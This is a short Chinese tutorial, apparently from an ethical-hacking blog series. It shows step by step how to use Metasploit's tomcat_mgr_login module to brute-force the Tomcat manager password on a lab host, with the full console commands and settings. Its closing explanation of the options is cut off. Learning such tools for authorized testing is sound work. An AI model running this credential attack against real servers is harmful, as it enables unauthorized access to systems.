Ethical Hackers

09 漏洞利用:使用Metasploit获取Tomcat的密码

2016-11-10  本文已影响208人  半个王国

本文使用 Metasploit module 去执行一个对Tomcat服务器的字典攻击,用来获取管理后台的密码。

实践-准备

如果是第一次使用,可能需要初始化并启动数据库:

msfdb init
msfdb start

实践-操作

  1. 启动Metasploit的控制台:
msfconsole
  1. 加载模块:tomcat_mgr_login
use auxiliary/scanner/http/tomcat_mgr_login
  1. 查看可用参数
show options
  1. 设置目标机器IP:
set rhosts 192.168.150.143
  1. 通过添加线程数,可以加速任务,这里我们设置为 5:
set threads 5
  1. 如果暴力破解速度过快,服务器会应为短时间内接收大量请求而崩溃,这里我们降低速度:
set bruteforce_speed 3
  1. 其他配置保持默认,使用默认字典,开始执行:
run
Paste_Image.png
Paste_Image.png

如图,绿色 + 号开头的那个,就是找到的匹配密码

总结

默认情况下,Tomcat使用TCP的8080端口,控制台应用上下文是:
/manager/html,这个应用使用HTTP认证。Metasploit 辅助模块(tomcat_mgr_login)中的一些配置,说明如下:

上一篇下一篇

猜你喜欢

热点阅读